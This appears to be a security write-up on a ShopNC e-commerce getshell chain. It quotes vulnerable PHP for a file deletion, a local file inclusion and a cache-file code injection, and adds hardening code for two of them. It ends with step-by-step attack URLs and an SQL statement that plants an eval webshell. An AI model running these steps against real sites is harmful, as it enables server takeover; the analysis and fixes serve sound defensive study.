Preface

Several ShopNC vulnerabilities chained together give a getshell. A bit brute-force -_-

Arbitrary file deletion

File control\store.php, line 1438 (there are several other identical spots)

``` php
// ........
$model_upload = Model('upload');
$file_info = $model_upload->getOneUpload(intval($_GET['file_id']));
if(!$file_info){
    // img_src comes straight from the request and is spliced into the path with no traversal check
    @unlink(ATTACH_SLIDE.DS.$_GET['img_src']);
}else{

// ........
```

Local file inclusion

File /framework/core/base.php, line 71

``` php
$act_file = realpath( BasePath.DS."control".DS.$_GET['act'].".php" );
}
if ( is_file( $act_file ) )
{
    // act is taken from the request unchanged, so "../" segments can reach any .php file on disk
    require( $act_file );
    $class_name = $_GET['act']."Control";
    if ( class_exists( $class_name ) )
```

Writing a shell through the admin "update cache" function

File model/adv_model.php, line 416

``` php
/**
 * Update one advertisement's cache file
 *
 * @param unknown_type $adv
 * @return unknown
 */
public function makeAdvCache($adv){
    $lang = Language::getLangContent();
    $tmp .= "<?php \r\n";
    $tmp .= "defined('InShopNC') or exit('Access Invalid!'); \r\n";
    if (is_numeric($adv) && $adv > 0){

        $condition['adv_id'] = $adv;
        $adv_info = $this->getList($condition);
        $adv = $adv_info['0'];
    }
    // ..................................
    $content = addslashes($v);
    $content = str_replace('$','\$',$content);
    // prevent a $ in the value from being parsed as a variable
    // note: only the value $v is escaped; the key $k (a column name from the database) is written into PHP source as-is
    $tmp .= '$'.$k." = \"".$content."\"; \r\n";
    }
    // location and file name of the cache file
    $cache_file = BasePath.'/cache/adv/adv_'.$adv['adv_id'].'.cache.php';
    file_put_contents($cache_file,$tmp);
```

Following into the getList function

``` php
public function getList($condition=array(), $page='', $limit='', $orderby=''){
    $param = array();
    $param['table'] = 'adv';
    // selects every column by default, so any column added to the table ends up in the cache file
    $param['field'] = $condition['field']?$condition['field']:'*';
    $param['where'] = $this->getCondition($condition);
    if($orderby == ''){
        $param['order'] = 'slide_sort, adv_id desc';
    }else{
        $param['order'] = $orderby;
    }
    $param['limit'] = $limit;
    return Db::select($param,$page);
}
```

When the cache file is written, the code iterates over the keys and values read from the database, and the keys are not filtered. Since the keys are column names taken straight from the database, anyone who controls the database can write arbitrary content into the cache file.
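Two hardening patterns for the deletion code and the cache writer above, as an added example (not ShopNC's own code; the function names, the `InvalidArgumentException` and the per-variable layout are my assumptions): the delete helper only removes a regular file that resolves directly inside the attachment directory, and the cache builder accepts only column names that are valid PHP identifiers and emits values with `var_export()` instead of hand-escaping them.

```php
<?php
// Added hardening example, not ShopNC code. Names and paths are assumptions.

// Delete $name only if it is a bare file name that resolves to a regular
// file directly inside $baseDir (blocks "/../../../install/lock" style input).
function safeUnlinkWithin(string $baseDir, string $name): bool {
    if ($name === '' || $name !== basename($name) || $name === '.' || $name === '..') {
        return false; // contains a path separator or is not a real file name
    }
    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $target === false || !is_file($target)) {
        return false;
    }
    // Containment check on the resolved path, not on the raw input.
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    return unlink($target);
}

// Build the cache file body; rejects keys that are not plain PHP identifiers,
// so a column such as "{eval($_POST[1])}" can never become PHP source.
function buildAdvCache(array $adv): string {
    $tmp  = "<?php\n";
    $tmp .= "defined('InShopNC') or exit('Access Invalid!');\n";
    foreach ($adv as $k => $v) {
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', (string)$k)) {
            throw new InvalidArgumentException("unsafe cache key: " . $k);
        }
        // var_export() yields a quoted PHP literal: "$", quotes and
        // backslashes in the value stay inside the string.
        $tmp .= '$' . $k . ' = ' . var_export((string)$v, true) . ";\n";
    }
    return $tmp;
}

// Constructed sample row: the second key mirrors the column added in the write-up.
$row = ['adv_id' => 14, 'adv_title' => 'hello "$world"'];
echo buildAdvCache($row);                       // emits $adv_id = '14'; $adv_title = ...
try {
    buildAdvCache(['{eval($_POST[1])}' => 'x']); // rejected, nothing is written
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```

Writing the whole row with a single `var_export($adv, true)` into `$adv = ...;` would avoid per-key variables entirely; the per-key form above stays close to the original layout.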

ShopNc GetShell

Combining the three vulnerabilities above gives an elegant getshell.
The flow is:

Arbitrary file deletion => reinstall => modify the column names of the shopnc_adv table => update the advertisement cache => getshell

Concrete steps
1: http://www.xxx.com/index.php?act=store&op=dorp_img&file_id=16&img_src=/../../../install/lock
2: Reinstall the system
3: In MySQL, execute the SQL: ALTER TABLE shopnc_adv ADD {eval($_POST[1])} VARCHAR( 100 ) NOT NULL ;
4: In the admin backend, update the advertisement cache: http://www.xxx.com/admin/index.php?act=adv&op=adv_edit&adv_id=14
5: Connect to the shell: http://www.xxx.com/index.php?act=../cache/adv/adv_14.cache